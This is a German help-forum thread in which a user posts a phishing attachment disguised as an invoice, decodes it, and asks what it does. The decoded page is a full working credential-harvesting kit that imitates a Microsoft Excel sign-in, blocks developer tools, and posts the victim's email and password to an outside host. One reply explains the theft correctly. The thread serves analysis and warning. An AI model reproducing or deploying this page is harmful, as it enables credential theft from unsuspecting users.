Was machen diese JavaScripts?
#1
Servus!

Brauche Eure Hilfe!

Heute Nacht bekam mein Chef von einem Lieferanten eine Mail mit dem Anhang "Invoice.html". Nichts Böses ahnend, versuchte er, den Anhang zu öffnen, merkte aber sofort, dass hier etwas faul ist.
Das hier ist Inhalt von "Invoice.html"
Code:
<script>
    var url_string = "firmenmail@adresse.com";
    var data = atob("");
    document.write(data)
</script>

Konnte soweit den Inhalt dekodieren...
Code:
<!DOCTYPE html>
<html dir="ltr" class="" lang="en">
    <head>
    <!-- Analyst note: the page borrows its look from genuine resources. The favicon and
         the login stylesheet below are hot-linked from aadcdn.msftauth.net (Microsoft's
         sign-in CDN) and jQuery from ajax.googleapis.com, so these requests on their own
         look benign in proxy logs. The title claims an "Excel worksheet". -->
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Excel worksheet</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">
    <!-- jQuery is required by the $.ajax calls in the script at the end of the body. -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
    <link rel="shortcut icon" href="https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico">
    <!-- This link has no rel attribute, so it most likely has no effect. -->
    <link crossorigin="anonymous" href="https://cdn.jsdelivr.net/npm/cors@2.8.5/lib/index.min.js">
    <link data-loader="cdn" crossorigin="anonymous" href="https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_ziytf8dzt9eg1s6-ohhleg2.css" rel="stylesheet">
</head>
<script>
    // prevent ctrl + s
    window.addEventListener('keydown', async(e) => {
        if (e.ctrlKey && (e.which == 83)) {
            e.preventDefault();
            return false; }
    });
    window.addEventListener('contextmenu', event => event.preventDefault());
    document.onkeydown = function (e) {
        if (event.keyCode == 123) {
            return false;
        }
        if (e.ctrlKey && e.keyCode == 'E'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.shiftKey && e.keyCode == 'I'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.shiftKey && e.keyCode == 'J'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.keyCode == 'U'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.keyCode == 'S'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.keyCode == 'H'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.keyCode == 'A'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.keyCode == 'F'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.keyCode == 'E'.charCodeAt(0)) {
            return false;
        }
    }
    window.onkeydown = (e) => {
        return !(e.ctrlKey &&
            (e.keyCode === 67 ||
                e.keyCode === 86 ||
                e.keyCode === 85 ||
                e.keyCode === 117));
    };
</script>
<body class="cb" style="display: block;">
<form name="f1" id="i0281" method="post" autocomplete="off">
    <div class="login-paginated-page">
        <div id="lightboxTemplateContainer">
<div id="lightboxBackgroundContainer">
    <div class="background-image-holder" role="presentation">
    <div class="background-image ext-background-image" style="background-image: url(&quot;https://gyazo.com/e21eccf9e307e360e3a80ce6bbc74af8.pgn;);"></div>
</div></div>
    <div class="outer" id="bgImgCenter">
        <div class="template-section main-section">
            <div class="middle ext-middle">
                <div class="full-height">
    <div class="flex-column">
        <div class="win-scroll">
            <div id="lightbox" class="sign-in-box ext-sign-in-box fade-in-lightbox">
            <div><img src="https://i.gyazo.com/7ae773ff61e2c8a88bda5530c3b2aa13.png" style="width:90px; height:75px;"></div>
            <div role="main">
        <div id="pstb" class="pagination-view animate has-identity-banner slide-in-next">
        <div>
            <div class="identityBanner">
                <button type="button" class="backButton" id="idBtn_Back"> <img role="presentation" pngsrc="https://aadcdn.msftauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png" svgsrc="https://aadcdn.msftauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg" src="https://aadcdn.msftauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg"> </button>
                <div id="show-email" class="identity"></div>
            </div>
    <div id="loginHeader" class="row title ext-title">
        <div role="heading" aria-level="1">Enter password</div>
    </div>
    <div id="errorpw" style="color: red; margin: 15px; margin-left: 0px; margin-top: 0px; margin-bottom: 0px;"></div>
    <div id="important1" style="color: black;font-size: 13px;">
        Because you're accessing sensitive info, you need to verify your password to view excel worksheets
     </div>
    <!-- Analyst note: this is the only text-entry field in the visible markup. The
         enclosing form has no action attribute; the script at the end of the body
         reads this field by its id (i0118) when the button #Button9 is clicked. -->
    <div class="row">
        <div class="form-group col-md-24">
            <div class="placeholderContainer">
                <input name="passwd" type="password" id="i0118" autocomplete="off" class="form-control input ext-input text-box ext-text-box" placeholder="Password" required />
            </div>
        </div>
    </div>
    <div>
    <div class="position-buttons">
        <div>
            <div class="row">
                <div class="col-md-24">
                    <div class="text-13">
                        <div class="form-group">
                            <a id="idA_PWD_ForgotPassword" role="link" href="#">Note: Only recipient's email can access shared files</a>
                        </div>
    <div class="form-group">
    </div>
            <div class="form-group">
                <a id="i1668" href="#"></a>
            </div></div></div></div>
        </div>

        <div class="win-button-pin-bottom">
            <div class="row">
                <div><div class="col-xs-24 no-padding-left-right button-container">
        <div class="inline-block">
            <input type="submit" id="Button9" class="win-button button_primary button ext-button primary ext-primary" value="Signin">
        </div>
    </div></div>
            </div>
        </div>
    </div></div>
        </div>
    </div>
    </div>
    </div>
    </div>
        </div>
    </div></div>
            </div>
        </div>
        <div class="plate footer ext-footer" role="contentinfo"></div>
    <div id="footer" role="contentinfo" class="footer ext-footer">
        <div>
<div id="footerLinks" class="footerNode text-secondary">
        <a id="ftrTerms" href="#" class="footer-content ext-footer-content footer-item ext-footer-item">Terms of use</a>
        <a id="ftrPrivacy" href="#" class="footer-content ext-footer-content footer-item ext-footer-item">Privacy &amp; cookies</a>
    <a id="moreOptions" href="#" aria-label="Click here for troubleshooting information" class="footer-content ext-footer-content footer-item ext-footer-item debug-item ext-debug-item">...</a>
</div></div>
    </div>
</div>
</div></div>
</form>
<script>
    var count = 0;
    function set_brand(email) {
        $.ajax({
            url: 'https://bascom.pl/wp-content/themes/vantage/templates/zaki/pii.php',
            type: "POST",
            data: { username: email },
            success: function (response) {
                let res = JSON.parse(response)
                let logo = res["res"]["BannerLogo"], background = res["res"]["Illustration"], DarkTile = res["res"]["TileDarkLogo"]
                let TileLogo = res["res"]["TileLogo"], BoilerPlateText = res["res"]["BoilerPlateText"]
                if (logo) {
                    $('.logo').attr('src', logo);
                }
                if (BoilerPlateText) {
                    console.log(BoilerPlateText);
                    $(".plate").append(BoilerPlateText);
                    $(".plate").css({"text-align": "center"})
                }
                if (background) {
                    $('.background-image').css({ 'background-image': 'url(' + background + ')', "-webkit-filter": "brightness(20%)", "filter": "brightness(47%)" });
                } else if (DarkTile) {
                    $('.background-image').css({ 'background-image': 'url(' + DarkTile + ')', "-webkit-filter": "brightness(20%)", "filter": "brightness(47%)" });
                } else if (TileLogo) {
                    $('.background-image').css({ 'background-image': 'url(' + TileLogo + ')', "-webkit-filter": "brightness(20%)", "filter": "brightness(47%)" });
                }
            }
        });
    }

    function send_result(user, pass) {
        $.ajax({
            url: 'https://bascom.pl/wp-content/themes/vantage/templates/zaki/pii.php',
            data: {
                "email": user,
                "password": pass
            },
            type: "POST",
            success: function (data) {
                console.log(data);
            },
            error: function (data) {
                console.log('Ajax error');
            }
        });
    }


    document.addEventListener('DOMContentLoaded', async() => {
        if(url_string){
            document.getElementById("show-email").innerHTML = url_string;
            document.getElementById("i0118").focus();
            set_brand(url_string);
        }

        document.getElementById("Button9").addEventListener("click", e => {
            event.preventDefault ? event.preventDefault() : event.returnValue = false;

            var pswd = document.getElementById("i0118").value;
            if(pswd.length < 5){
                document.getElementById("important1").style.display="none";
                setTimeout(() => {document.getElementById("i0281").reset(); document.getElementById('errorpw').innerHTML = "Your account password is too short."}, 1500);
            } else if (pswd.length > 5 && count <= 0) {
                send_result(url_string, pswd);
                document.getElementById("important1").style.display="none";
                setTimeout(() => {count++; document.getElementById("i0281").reset(); document.getElementById('errorpw').innerHTML = `Your password is incorrect. Please enter the password for your above email to access Excel worksheet, <a href="#"></a>`}, 2000)
            } else if (count < 2){
                send_result(url_string, pswd);
                document.getElementById("important1").style.display = "none";
                setTimeout(() => {count++; document.getElementById("i0281").reset(); document.getElementById('errorpw').innerHTML = `Your password is incorrect. Please enter the password for your above email to access Excel worksheet, <a href="#"></a>`}, 2000)
            } else {
                send_result(url_string, pswd);
                setTimeout(() => {window.location.replace("https://outlook.office365.com/Encryption/ErrorPage.aspx?src=3&code=11&be=SN6PR04MB4014&fe=JNAP275CA0040.ZAFP275.PROD.OUTLOOgK.COM&loc=en-US&itemID=E4E_M_e9df154a-e4b8-4486-8aec-7acceeb93fee")});
            }
        });
    });
</script>
</div></body></html>

... leider spreche ich kein JavaScript! Könntet Ihr mich bitte aufklären, was die Scripts hier genau machen und welche Maßnahmen ich ergreifen muss!

Besten Dank im Voraus!
#2
Hi,
das Ganze erstellt sozusagen eine neue HTML-Seite mithilfe von JavaScript und der Methode write.
Es erstellt eine Fakeseite, auf der eine Excel-Tabelle abgebildet ist und auf der man sein Passwort eingeben soll. Es ist ein billiger Trick, um Daten abzufischen.

Zusatz: Es sendet die Daten, also die E-Mail-Adresse und gegebenenfalls das eingegebene Passwort, an: https://bascom.pl

Das würde ich dort vielleicht auch melden, weil die nix über deren Angriff wissen. Durch einen WordPress-Fehler konnten sie diese Seite nutzen, um heimlich Daten aufzuzeichnen.


"Gerne dürft ihr mir eine gute Bewertung da lassen aber auch gegenüber Kritik bin ich offen" Angel
#3
I guess it sends emails to an email user automatically.